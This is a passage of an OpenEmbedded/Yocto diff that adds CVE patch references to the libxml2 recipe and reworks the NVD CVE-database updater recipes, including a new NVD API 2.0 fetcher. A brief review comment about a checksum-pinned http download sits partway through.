4BUGTRACKER = "http://bugzilla.gnome.org/buglist.cgi?product=libxml2" 4BUGTRACKER = "http://bugzilla.gnome.org/buglist.cgi?product=libxml2"
5SECTION = "libs" 5SECTION = "libs"
6LICENSE = "MIT" 6LICENSE = "MIT"
@@ -11,8 +11,9 @@ LIC_FILES_CHKSUM = "file://Copyright;md5=2044417e2e5006b65a8b9067b683fcf1 \
11 11
12DEPENDS = "zlib virtual/libiconv" 12DEPENDS = "zlib virtual/libiconv"
13 13
14SRC_URI = "http://www.xmlsoft.org/sources/libxml2-${PV}.tar.gz;name=libtar \ 14inherit gnomebase
15 http://www.w3.org/XML/Test/xmlts20080827.tar.gz;subdir=${BP};name=testtar \ 15
16SRC_URI += "http://www.w3.org/XML/Test/xmlts20080827.tar.gz;subdir=${BP};name=testtar \
16 file://libxml-64bit.patch \ 17 file://libxml-64bit.patch \
17 file://runtest.patch \ 18 file://runtest.patch \
18 file://run-ptest \ 19 file://run-ptest \
@@ -23,10 +24,31 @@ SRC_URI = "http://www.xmlsoft.org/sources/libxml2-${PV}.tar.gz;name=libtar \
23 file://CVE-2020-7595.patch \ 24 file://CVE-2020-7595.patch \
24 file://CVE-2019-20388.patch \ 25 file://CVE-2019-20388.patch \
25 file://CVE-2020-24977.patch \ 26 file://CVE-2020-24977.patch \
27 file://CVE-2021-3517.patch \
28 file://CVE-2021-3537.patch \
29 file://CVE-2021-3518.patch \
30 file://CVE-2021-3541.patch \
31 file://CVE-2022-23308.patch \
32 file://CVE-2022-23308-fix-regression.patch \
33 file://CVE-2022-29824-dependent.patch \
34 file://CVE-2022-29824.patch \
35 file://0001-Port-gentest.py-to-Python-3.patch \
36 file://CVE-2016-3709.patch \
37 file://CVE-2022-40303.patch \
38 file://CVE-2022-40304.patch \
39 file://CVE-2023-28484.patch \
40 file://CVE-2023-29469.patch \
41 file://CVE-2023-39615-pre.patch \
42 file://CVE-2023-39615-0001.patch \
43 file://CVE-2023-39615-0002.patch \
44 file://CVE-2021-3516.patch \
45 file://CVE-2023-45322-1.patch \
46 file://CVE-2023-45322-2.patch \
47 file://CVE-2024-25062-pre1.patch \
48 file://CVE-2024-25062.patch \
26 " 49 "
27 50
28SRC_URI[libtar.md5sum] = "10942a1dc23137a8aa07f0639cbfece5" 51SRC_URI[archive.sha256sum] = "593b7b751dd18c2d6abcd0c4bcb29efc203d0b4373a6df98e3a455ea74ae2813"
29SRC_URI[libtar.sha256sum] = "aafee193ffb8fe0c82d4afef6ef91972cbaf5feea100edc2f262750611b4be1f"
30SRC_URI[testtar.md5sum] = "ae3d1ebe000a3972afa104ca7f0e1b4a" 52SRC_URI[testtar.md5sum] = "ae3d1ebe000a3972afa104ca7f0e1b4a"
31SRC_URI[testtar.sha256sum] = "96151685cec997e1f9f3387e3626d61e6284d4d6e66e0e440c209286c03e9cc7" 53SRC_URI[testtar.sha256sum] = "96151685cec997e1f9f3387e3626d61e6284d4d6e66e0e440c209286c03e9cc7"
32 54
@@ -40,9 +62,9 @@ PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6,"
40 62
41inherit autotools pkgconfig binconfig-disabled ptest features_check 63inherit autotools pkgconfig binconfig-disabled ptest features_check
42 64
43inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3native', '', d)} 65inherit ${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3targetconfig', '', d)}
44 66
45RDEPENDS_${PN}-ptest += "make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}" 67RDEPENDS_${PN}-ptest += "bash make ${@bb.utils.contains('PACKAGECONFIG', 'python', 'libgcc python3-core python3-logging python3-shell python3-stringold python3-threading python3-unittest ${PN}-python', '', d)}"
46 68
47RDEPENDS_${PN}-python += "${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3-core', '', d)}" 69RDEPENDS_${PN}-python += "${@bb.utils.contains('PACKAGECONFIG', 'python', 'python3-core', '', d)}"
48 70
@@ -81,6 +103,16 @@ do_configure_prepend () {
81} 103}
82 104
83do_compile_ptest() { 105do_compile_ptest() {
106 # Make sure that testapi.c is newer than gentests.py, because
107 # with reproducible builds, they will both get e.g. Jan 1 1970
108 # modification time from SOURCE_DATE_EPOCH and then check-am
109 # might try to rebuild_testapi, which will fail even with
110 # 0001-Port-gentest.py-to-Python-3.patch, because it needs
111 # libxml2 module (libxml2-native dependency and correctly
112 # set PYTHON_SITE_PACKAGES), it's easier to
113 # just rely on pre-generated testapi.c from the release
114 touch ${S}/testapi.c
115
84 oe_runmake check-am 116 oe_runmake check-am
85} 117}
86 118
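Review bot: The rewritten `SRC_URI +=` line still fetches the W3C test suite over plain `http://www.w3.org/XML/Test/xmlts20080827.tar.gz`, while the main archive now comes from the GNOME mirror through `inherit gnomebase` with only a `sha256sum`. The pinned `SRC_URI[testtar.sha256sum]` means a tampered download would be rejected, so this is hardening rather than a defect. If the server offers the same path over `https://`, switching would be consistent with the rest of the change. `SRC_URI[testtar.md5sum]` could then be dropped as well, as was done for the main tarball.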
diff --git a/meta/recipes-core/meta/buildtools-tarball.bb b/meta/recipes-core/meta/buildtools-tarball.bb
index faf7108a86..24f5f28589 100644
--- a/meta/recipes-core/meta/buildtools-tarball.bb
+++ b/meta/recipes-core/meta/buildtools-tarball.bb
@@ -66,7 +66,7 @@ create_sdk_files_append () {
66 # Generate new (mini) sdk-environment-setup file 66 # Generate new (mini) sdk-environment-setup file
67 script=${1:-${SDK_OUTPUT}/${SDKPATH}/environment-setup-${SDK_SYS}} 67 script=${1:-${SDK_OUTPUT}/${SDKPATH}/environment-setup-${SDK_SYS}}
68 touch $script 68 touch $script
69 echo 'export PATH=${SDKPATHNATIVE}${bindir_nativesdk}:${SDKPATHNATIVE}${sbindir_nativesdk}:${SDKPATHNATIVE}${base_bindir_nativesdk}:${SDKPATHNATIVE}${base_sbindir_nativesdk}:$PATH' >> $script 69 echo 'export PATH="${SDKPATHNATIVE}${bindir_nativesdk}:${SDKPATHNATIVE}${sbindir_nativesdk}:${SDKPATHNATIVE}${base_bindir_nativesdk}:${SDKPATHNATIVE}${base_sbindir_nativesdk}:$PATH"' >> $script
70 echo 'export OECORE_NATIVE_SYSROOT="${SDKPATHNATIVE}"' >> $script 70 echo 'export OECORE_NATIVE_SYSROOT="${SDKPATHNATIVE}"' >> $script
71 echo 'export GIT_SSL_CAINFO="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script 71 echo 'export GIT_SSL_CAINFO="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script
72 echo 'export SSL_CERT_FILE="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script 72 echo 'export SSL_CERT_FILE="${SDKPATHNATIVE}${sysconfdir}/ssl/certs/ca-certificates.crt"' >>$script
diff --git a/meta/recipes-core/meta/cve-update-db-native.bb b/meta/recipes-core/meta/cve-update-db-native.bb
index 9e8e006a32..efc32470d3 100644
--- a/meta/recipes-core/meta/cve-update-db-native.bb
+++ b/meta/recipes-core/meta/cve-update-db-native.bb
@@ -12,28 +12,76 @@ deltask do_compile
12deltask do_install 12deltask do_install
13deltask do_populate_sysroot 13deltask do_populate_sysroot
14 14
15# CVE database update interval, in seconds. By default: once a day (24*60*60).
16# Use 0 to force the update
17# Use a negative value to skip the update
18CVE_DB_UPDATE_INTERVAL ?= "86400"
19
20# Timeout for blocking socket operations, such as the connection attempt.
21CVE_SOCKET_TIMEOUT ?= "60"
22NVDCVE_URL ?= "https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-"
23
24CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_1.1.db"
25
15python () { 26python () {
16 if not bb.data.inherits_class("cve-check", d): 27 if not bb.data.inherits_class("cve-check", d):
17 raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.") 28 raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.")
18} 29}
19 30
20python do_populate_cve_db() { 31python do_fetch() {
21 """ 32 """
22 Update NVD database with json data feed 33 Update NVD database with json data feed
23 """ 34 """
24 import bb.utils 35 import bb.utils
25 import bb.progress 36 import bb.progress
26 import sqlite3, urllib, urllib.parse, shutil, gzip 37 import shutil
27 from datetime import date
28 38
29 bb.utils.export_proxies(d) 39 bb.utils.export_proxies(d)
30 40
31 BASE_URL = "https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-"
32 YEAR_START = 2002
33
34 db_file = d.getVar("CVE_CHECK_DB_FILE") 41 db_file = d.getVar("CVE_CHECK_DB_FILE")
35 db_dir = os.path.dirname(db_file) 42 db_dir = os.path.dirname(db_file)
43 db_tmp_file = d.getVar("CVE_DB_TEMP_FILE")
44
45 cleanup_db_download(db_file, db_tmp_file)
46
47 # The NVD database changes once a day, so no need to update more frequently
48 # Allow the user to force-update
49 try:
50 import time
51 update_interval = int(d.getVar("CVE_DB_UPDATE_INTERVAL"))
52 if update_interval < 0:
53 bb.note("CVE database update skipped")
54 return
55 if time.time() - os.path.getmtime(db_file) < update_interval:
56 return
36 57
58 except OSError:
59 pass
60
61 bb.utils.mkdirhier(db_dir)
62 if os.path.exists(db_file):
63 shutil.copy2(db_file, db_tmp_file)
64
65 if update_db_file(db_tmp_file, d) == True:
66 # Update downloaded correctly, can swap files
67 shutil.move(db_tmp_file, db_file)
68 else:
69 # Update failed, do not modify the database
70 bb.note("CVE database update failed")
71 os.remove(db_tmp_file)
72}
73
74do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
75do_fetch[file-checksums] = ""
76do_fetch[vardeps] = ""
77
78def cleanup_db_download(db_file, db_tmp_file):
79 """
80 Cleanup the download space from possible failed downloads
81 """
82
83 # Clean up the updates done on the main file
84 # Remove it only if a journal file exists - it means a complete re-download
37 if os.path.exists("{0}-journal".format(db_file)): 85 if os.path.exists("{0}-journal".format(db_file)):
38 # If a journal is present the last update might have been interrupted. In that case, 86 # If a journal is present the last update might have been interrupted. In that case,
39 # just wipe any leftovers and force the DB to be recreated. 87 # just wipe any leftovers and force the DB to be recreated.
@@ -42,37 +90,50 @@ python do_populate_cve_db() {
42 if os.path.exists(db_file): 90 if os.path.exists(db_file):
43 os.remove(db_file) 91 os.remove(db_file)
44 92
45 # Don't refresh the database more than once an hour 93 # Clean-up the temporary file downloads, we can remove both journal
46 try: 94 # and the temporary database
47 import time 95 if os.path.exists("{0}-journal".format(db_tmp_file)):
48 if time.time() - os.path.getmtime(db_file) < (60*60): 96 # If a journal is present the last update might have been interrupted. In that case,
49 return 97 # just wipe any leftovers and force the DB to be recreated.
50 except OSError: 98 os.remove("{0}-journal".format(db_tmp_file))
51 pass
52 99
53 bb.utils.mkdirhier(db_dir) 100 if os.path.exists(db_tmp_file):
101 os.remove(db_tmp_file)
54 102
55 # Connect to database 103def update_db_file(db_tmp_file, d):
56 conn = sqlite3.connect(db_file) 104 """
57 c = conn.cursor() 105 Update the given database file
106 """
107 import bb.utils, bb.progress
108 from datetime import date
109 import urllib, gzip, sqlite3
58 110
59 initialize_db(c) 111 YEAR_START = 2002
112 cve_socket_timeout = int(d.getVar("CVE_SOCKET_TIMEOUT"))
113
114 # Connect to database
115 conn = sqlite3.connect(db_tmp_file)
116 initialize_db(conn)
60 117
61 with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f: 118 with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f:
62 total_years = date.today().year + 1 - YEAR_START 119 total_years = date.today().year + 1 - YEAR_START
63 for i, year in enumerate(range(YEAR_START, date.today().year + 1)): 120 for i, year in enumerate(range(YEAR_START, date.today().year + 1)):
121 bb.debug(2, "Updating %d" % year)
64 ph.update((float(i + 1) / total_years) * 100) 122 ph.update((float(i + 1) / total_years) * 100)
65 year_url = BASE_URL + str(year) 123 year_url = (d.getVar('NVDCVE_URL')) + str(year)
66 meta_url = year_url + ".meta" 124 meta_url = year_url + ".meta"
67 json_url = year_url + ".json.gz" 125 json_url = year_url + ".json.gz"
68 126
69 # Retrieve meta last modified date 127 # Retrieve meta last modified date
70 try: 128 try:
71 response = urllib.request.urlopen(meta_url) 129 response = urllib.request.urlopen(meta_url, timeout=cve_socket_timeout)
72 except urllib.error.URLError as e: 130 except urllib.error.URLError as e:
73 cve_f.write('Warning: CVE db update error, Unable to fetch CVE data.\n\n') 131 cve_f.write('Warning: CVE db update error, Unable to fetch CVE data.\n\n')
74 bb.warn("Failed to fetch CVE data (%s)" % e.reason) 132 bb.warn("Failed to fetch CVE data (%s)" % e)
75 return 133 import socket
134 result = socket.getaddrinfo("nvd.nist.gov", 443, proto=socket.IPPROTO_TCP)
135 bb.warn("Host IPs are %s" % (", ".join(t[4][0] for t in result)))
136 return False
76 137
77 if response: 138 if response:
78 for l in response.read().decode("utf-8").splitlines(): 139 for l in response.read().decode("utf-8").splitlines():
@@ -82,64 +143,81 @@ python do_populate_cve_db() {
82 break 143 break
83 else: 144 else:
84 bb.warn("Cannot parse CVE metadata, update failed") 145 bb.warn("Cannot parse CVE metadata, update failed")
85 return 146 return False
86 147
87 # Compare with current db last modified date 148 # Compare with current db last modified date
88 c.execute("select DATE from META where YEAR = ?", (year,)) 149 cursor = conn.execute("select DATE from META where YEAR = ?", (year,))
89 meta = c.fetchone() 150 meta = cursor.fetchone()
151 cursor.close()
152
90 if not meta or meta[0] != last_modified: 153 if not meta or meta[0] != last_modified:
154 bb.debug(2, "Updating entries")
91 # Clear products table entries corresponding to current year 155 # Clear products table entries corresponding to current year
92 c.execute("delete from PRODUCTS where ID like ?", ('CVE-%d%%' % year,)) 156 conn.execute("delete from PRODUCTS where ID like ?", ('CVE-%d%%' % year,)).close()
93 157
94 # Update db with current year json file 158 # Update db with current year json file
95 try: 159 try:
96 response = urllib.request.urlopen(json_url) 160 response = urllib.request.urlopen(json_url, timeout=cve_socket_timeout)
97 if response: 161 if response:
98 update_db(c, gzip.decompress(response.read()).decode('utf-8')) 162 update_db(conn, gzip.decompress(response.read()).decode('utf-8'))
99 c.execute("insert or replace into META values (?, ?)", [year, last_modified]) 163 conn.execute("insert or replace into META values (?, ?)", [year, last_modified]).close()
100 except urllib.error.URLError as e: 164 except urllib.error.URLError as e:
101 cve_f.write('Warning: CVE db update error, CVE data is outdated.\n\n') 165 cve_f.write('Warning: CVE db update error, CVE data is outdated.\n\n')
102 bb.warn("Cannot parse CVE data (%s), update failed" % e.reason) 166 bb.warn("Cannot parse CVE data (%s), update failed" % e.reason)
103 return 167 return False
104 168 else:
169 bb.debug(2, "Already up to date (last modified %s)" % last_modified)
105 # Update success, set the date to cve_check file. 170 # Update success, set the date to cve_check file.
106 if year == date.today().year: 171 if year == date.today().year:
107 cve_f.write('CVE database update : %s\n\n' % date.today()) 172 cve_f.write('CVE database update : %s\n\n' % date.today())
108 173
109 conn.commit() 174 conn.commit()
110 conn.close() 175 conn.close()
111} 176 return True
112 177
113do_populate_cve_db[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}" 178def initialize_db(conn):
179 with conn:
180 c = conn.cursor()
114 181
115def initialize_db(c): 182 c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
116 c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
117 183
118 c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \ 184 c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
119 SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)") 185 SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
120 186
121 c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \ 187 c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
122 VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \ 188 VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
123 VERSION_END TEXT, OPERATOR_END TEXT)") 189 VERSION_END TEXT, OPERATOR_END TEXT)")
124 c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);") 190 c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
125 191
126def parse_node_and_insert(c, node, cveId): 192 c.close()
193
194def parse_node_and_insert(conn, node, cveId):
127 # Parse children node if needed 195 # Parse children node if needed
128 for child in node.get('children', ()): 196 for child in node.get('children', ()):
129 parse_node_and_insert(c, child, cveId) 197 parse_node_and_insert(conn, child, cveId)
130 198
131 def cpe_generator(): 199 def cpe_generator():
132 for cpe in node.get('cpe_match', ()): 200 for cpe in node.get('cpe_match', ()):
133 if not cpe['vulnerable']: 201 if not cpe['vulnerable']:
134 return 202 return
135 cpe23 = cpe['cpe23Uri'].split(':') 203 cpe23 = cpe.get('cpe23Uri')
204 if not cpe23:
205 return
206 cpe23 = cpe23.split(':')
207 if len(cpe23) < 6:
208 return
136 vendor = cpe23[3] 209 vendor = cpe23[3]
137 product = cpe23[4] 210 product = cpe23[4]
138 version = cpe23[5] 211 version = cpe23[5]
139 212
213 if cpe23[6] == '*' or cpe23[6] == '-':
214 version_suffix = ""
215 else:
216 version_suffix = "_" + cpe23[6]
217
140 if version != '*' and version != '-': 218 if version != '*' and version != '-':
141 # Version is defined, this is a '=' match 219 # Version is defined, this is a '=' match
142 yield [cveId, vendor, product, version, '=', '', ''] 220 yield [cveId, vendor, product, version + version_suffix, '=', '', '']
143 elif version == '-': 221 elif version == '-':
144 # no version information is available 222 # no version information is available
145 yield [cveId, vendor, product, version, '', '', ''] 223 yield [cveId, vendor, product, version, '', '', '']
@@ -173,9 +251,9 @@ def parse_node_and_insert(c, node, cveId):
173 # Save processing by representing as -. 251 # Save processing by representing as -.
174 yield [cveId, vendor, product, '-', '', '', ''] 252 yield [cveId, vendor, product, '-', '', '', '']
175 253
176 c.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()) 254 conn.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()).close()
177 255
178def update_db(c, jsondata): 256def update_db(conn, jsondata):
179 import json 257 import json
180 root = json.loads(jsondata) 258 root = json.loads(jsondata)
181 259
@@ -199,15 +277,14 @@ def update_db(c, jsondata):
199 accessVector = accessVector or "UNKNOWN" 277 accessVector = accessVector or "UNKNOWN"
200 cvssv3 = 0.0 278 cvssv3 = 0.0
201 279
202 c.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)", 280 conn.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
203 [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]) 281 [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]).close()
204 282
205 configurations = elt['configurations']['nodes'] 283 configurations = elt['configurations']['nodes']
206 for config in configurations: 284 for config in configurations:
207 parse_node_and_insert(c, config, cveId) 285 parse_node_and_insert(conn, config, cveId)
208 286
209 287
210addtask do_populate_cve_db before do_fetch 288do_fetch[nostamp] = "1"
211do_populate_cve_db[nostamp] = "1"
212 289
213EXCLUDE_FROM_WORLD = "1" 290EXCLUDE_FROM_WORLD = "1"
diff --git a/meta/recipes-core/meta/cve-update-nvd2-native.bb b/meta/recipes-core/meta/cve-update-nvd2-native.bb
new file mode 100644
index 0000000000..1a3eeba6d0
--- /dev/null
+++ b/meta/recipes-core/meta/cve-update-nvd2-native.bb
@@ -0,0 +1,372 @@
1SUMMARY = "Updates the NVD CVE database"
2LICENSE = "MIT"
3
4# Important note:
5# This product uses the NVD API but is not endorsed or certified by the NVD.
6
7INHIBIT_DEFAULT_DEPS = "1"
8
9inherit native
10
11deltask do_unpack
12deltask do_patch
13deltask do_configure
14deltask do_compile
15deltask do_install
16deltask do_populate_sysroot
17
18NVDCVE_URL ?= "https://services.nvd.nist.gov/rest/json/cves/2.0"
19
20# If you have a NVD API key (https://nvd.nist.gov/developers/request-an-api-key)
21# then setting this to get higher rate limits.
22NVDCVE_API_KEY ?= ""
23
24# CVE database update interval, in seconds. By default: once a day (24*60*60).
25# Use 0 to force the update
26# Use a negative value to skip the update
27CVE_DB_UPDATE_INTERVAL ?= "86400"
28
29# CVE database incremental update age threshold, in seconds. If the database is
30# older than this threshold, do a full re-download, else, do an incremental
31# update. By default: the maximum allowed value from NVD: 120 days (120*24*60*60)
32# Use 0 to force a full download.
33CVE_DB_INCR_UPDATE_AGE_THRES ?= "10368000"
34
35# Number of attempts for each http query to nvd server before giving up
36CVE_DB_UPDATE_ATTEMPTS ?= "5"
37
38CVE_DB_TEMP_FILE ?= "${CVE_CHECK_DB_DIR}/temp_nvdcve_2.db"
39
40python () {
41 if not bb.data.inherits_class("cve-check", d):
42 raise bb.parse.SkipRecipe("Skip recipe when cve-check class is not loaded.")
43}
44
45python do_fetch() {
46 """
47 Update NVD database with API 2.0
48 """
49 import bb.utils
50 import bb.progress
51 import shutil
52
53 bb.utils.export_proxies(d)
54
55 db_file = d.getVar("CVE_CHECK_DB_FILE")
56 db_dir = os.path.dirname(db_file)
57 db_tmp_file = d.getVar("CVE_DB_TEMP_FILE")
58
59 cleanup_db_download(db_file, db_tmp_file)
60 # By default let's update the whole database (since time 0)
61 database_time = 0
62
63 # The NVD database changes once a day, so no need to update more frequently
64 # Allow the user to force-update
65 try:
66 import time
67 update_interval = int(d.getVar("CVE_DB_UPDATE_INTERVAL"))
68 if update_interval < 0:
69 bb.note("CVE database update skipped")
70 return
71 if time.time() - os.path.getmtime(db_file) < update_interval:
72 bb.note("CVE database recently updated, skipping")
73 return
74 database_time = os.path.getmtime(db_file)
75
76 except OSError:
77 pass
78
79 bb.utils.mkdirhier(db_dir)
80 if os.path.exists(db_file):
81 shutil.copy2(db_file, db_tmp_file)
82
83 if update_db_file(db_tmp_file, d, database_time) == True:
84 # Update downloaded correctly, can swap files
85 shutil.move(db_tmp_file, db_file)
86 else:
87 # Update failed, do not modify the database
88 bb.warn("CVE database update failed")
89 os.remove(db_tmp_file)
90}
91
92do_fetch[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}"
93do_fetch[file-checksums] = ""
94do_fetch[vardeps] = ""
95
96def cleanup_db_download(db_file, db_tmp_file):
97 """
98 Cleanup the download space from possible failed downloads
99 """
100
101 # Clean up the updates done on the main file
102 # Remove it only if a journal file exists - it means a complete re-download
103 if os.path.exists("{0}-journal".format(db_file)):
104 # If a journal is present the last update might have been interrupted. In that case,
105 # just wipe any leftovers and force the DB to be recreated.
106 os.remove("{0}-journal".format(db_file))
107
108 if os.path.exists(db_file):
109 os.remove(db_file)
110
111 # Clean-up the temporary file downloads, we can remove both journal
112 # and the temporary database
113 if os.path.exists("{0}-journal".format(db_tmp_file)):
114 # If a journal is present the last update might have been interrupted. In that case,
115 # just wipe any leftovers and force the DB to be recreated.
116 os.remove("{0}-journal".format(db_tmp_file))
117
118 if os.path.exists(db_tmp_file):
119 os.remove(db_tmp_file)
120
121def nvd_request_wait(attempt, min_wait):
122 return min ( ( (2 * attempt) + min_wait ) , 30)
123
124def nvd_request_next(url, attempts, api_key, args, min_wait):
125 """
126 Request next part of the NVD database
127 NVD API documentation: https://nvd.nist.gov/developers/vulnerabilities
128 """
129
130 import urllib.request
131 import urllib.parse
132 import gzip
133 import http
134 import time
135
136 request = urllib.request.Request(url + "?" + urllib.parse.urlencode(args))
137 if api_key:
138 request.add_header("apiKey", api_key)
139 bb.note("Requesting %s" % request.full_url)
140
141 for attempt in range(attempts):
142 try:
143 r = urllib.request.urlopen(request)
144
145 if (r.headers['content-encoding'] == 'gzip'):
146 buf = r.read()
147 raw_data = gzip.decompress(buf).decode("utf-8")
148 else:
149 raw_data = r.read().decode("utf-8")
150
151 r.close()
152
153 except Exception as e:
154 wait_time = nvd_request_wait(attempt, min_wait)
155 bb.note("CVE database: received error (%s)" % (e))
156 bb.note("CVE database: retrying download after %d seconds. attempted (%d/%d)" % (wait_time, attempt+1, attempts))
157 time.sleep(wait_time)
158 pass
159 else:
160 return raw_data
161 else:
162 # We failed at all attempts
163 return None
164
165def update_db_file(db_tmp_file, d, database_time):
166 """
167 Update the given database file
168 """
169 import bb.utils, bb.progress
170 import datetime
171 import sqlite3
172 import json
173
174 # Connect to database
175 conn = sqlite3.connect(db_tmp_file)
176 initialize_db(conn)
177
178 req_args = {'startIndex' : 0}
179
180 incr_update_threshold = int(d.getVar("CVE_DB_INCR_UPDATE_AGE_THRES"))
181 if database_time != 0:
182 database_date = datetime.datetime.fromtimestamp(database_time, tz=datetime.timezone.utc)
183 today_date = datetime.datetime.now(tz=datetime.timezone.utc)
184 delta = today_date - database_date
185 if incr_update_threshold == 0:
186 bb.note("CVE database: forced full update")
187 elif delta < datetime.timedelta(seconds=incr_update_threshold):
188 bb.note("CVE database: performing partial update")
189 # The maximum range for time is 120 days
190 if delta > datetime.timedelta(days=120):
191 bb.error("CVE database: Trying to do an incremental update on a larger than supported range")
192 req_args['lastModStartDate'] = database_date.isoformat()
193 req_args['lastModEndDate'] = today_date.isoformat()
194 else:
195 bb.note("CVE database: file too old, forcing a full update")
196 else:
197 bb.note("CVE database: no preexisting database, do a full download")
198
199 with bb.progress.ProgressHandler(d) as ph, open(os.path.join(d.getVar("TMPDIR"), 'cve_check'), 'a') as cve_f:
200
201 bb.note("Updating entries")
202 index = 0
203 url = d.getVar("NVDCVE_URL")
204 api_key = d.getVar("NVDCVE_API_KEY") or None
205 attempts = int(d.getVar("CVE_DB_UPDATE_ATTEMPTS"))
206
207 # Recommended by NVD
208 wait_time = 6
209 if api_key:
210 wait_time = 2
211
212 while True:
213 req_args['startIndex'] = index
214 raw_data = nvd_request_next(url, attempts, api_key, req_args, wait_time)
215 if raw_data is None:
216 # We haven't managed to download data
217 return False
218
219 data = json.loads(raw_data)
220
221 index = data["startIndex"]
222 total = data["totalResults"]
223 per_page = data["resultsPerPage"]
224 bb.note("Got %d entries" % per_page)
225 for cve in data["vulnerabilities"]:
226 update_db(conn, cve)
227
228 index += per_page
229 ph.update((float(index) / (total+1)) * 100)
230 if index >= total:
231 break
232
233 # Recommended by NVD
234 time.sleep(wait_time)
235
236 # Update success, set the date to cve_check file.
237 cve_f.write('CVE database update : %s\n\n' % datetime.date.today())
238
239 conn.commit()
240 conn.close()
241 return True
242
243def initialize_db(conn):
244 with conn:
245 c = conn.cursor()
246
247 c.execute("CREATE TABLE IF NOT EXISTS META (YEAR INTEGER UNIQUE, DATE TEXT)")
248
249 c.execute("CREATE TABLE IF NOT EXISTS NVD (ID TEXT UNIQUE, SUMMARY TEXT, \
250 SCOREV2 TEXT, SCOREV3 TEXT, MODIFIED INTEGER, VECTOR TEXT)")
251
252 c.execute("CREATE TABLE IF NOT EXISTS PRODUCTS (ID TEXT, \
253 VENDOR TEXT, PRODUCT TEXT, VERSION_START TEXT, OPERATOR_START TEXT, \
254 VERSION_END TEXT, OPERATOR_END TEXT)")
255 c.execute("CREATE INDEX IF NOT EXISTS PRODUCT_ID_IDX on PRODUCTS(ID);")
256
257 c.close()
258
259def parse_node_and_insert(conn, node, cveId):
260
261 def cpe_generator():
262 for cpe in node.get('cpeMatch', ()):
263 if not cpe['vulnerable']:
264 return
265 cpe23 = cpe.get('criteria')
266 if not cpe23:
267 return
268 cpe23 = cpe23.split(':')
269 if len(cpe23) < 6:
270 return
271 vendor = cpe23[3]
272 product = cpe23[4]
273 version = cpe23[5]
274
275 if cpe23[6] == '*' or cpe23[6] == '-':
276 version_suffix = ""
277 else:
278 version_suffix = "_" + cpe23[6]
279
280 if version != '*' and version != '-':
281 # Version is defined, this is a '=' match
282 yield [cveId, vendor, product, version + version_suffix, '=', '', '']
283 elif version == '-':
284 # no version information is available
285 yield [cveId, vendor, product, version, '', '', '']
286 else:
287 # Parse start version, end version and operators
288 op_start = ''
289 op_end = ''
290 v_start = ''
291 v_end = ''
292
293 if 'versionStartIncluding' in cpe:
294 op_start = '>='
295 v_start = cpe['versionStartIncluding']
296
297 if 'versionStartExcluding' in cpe:
298 op_start = '>'
299 v_start = cpe['versionStartExcluding']
300
301 if 'versionEndIncluding' in cpe:
302 op_end = '<='
303 v_end = cpe['versionEndIncluding']
304
305 if 'versionEndExcluding' in cpe:
306 op_end = '<'
307 v_end = cpe['versionEndExcluding']
308
309 if op_start or op_end or v_start or v_end:
310 yield [cveId, vendor, product, v_start, op_start, v_end, op_end]
311 else:
312 # This is no version information, expressed differently.
313 # Save processing by representing as -.
314 yield [cveId, vendor, product, '-', '', '', '']
315
316 conn.executemany("insert into PRODUCTS values (?, ?, ?, ?, ?, ?, ?)", cpe_generator()).close()
317
318def update_db(conn, elt):
319 """
320 Update a single entry in the on-disk database
321 """
322
323 accessVector = None
324 cveId = elt['cve']['id']
325 if elt['cve']['vulnStatus'] == "Rejected":
326 c = conn.cursor()
327 c.execute("delete from PRODUCTS where ID = ?;", [cveId])
328 c.execute("delete from NVD where ID = ?;", [cveId])
329 c.close()
330 return
331 cveDesc = ""
332 for desc in elt['cve']['descriptions']:
333 if desc['lang'] == 'en':
334 cveDesc = desc['value']
335 date = elt['cve']['lastModified']
336 try:
337 accessVector = elt['cve']['metrics']['cvssMetricV2'][0]['cvssData']['accessVector']
338 cvssv2 = elt['cve']['metrics']['cvssMetricV2'][0]['cvssData']['baseScore']
339 except KeyError:
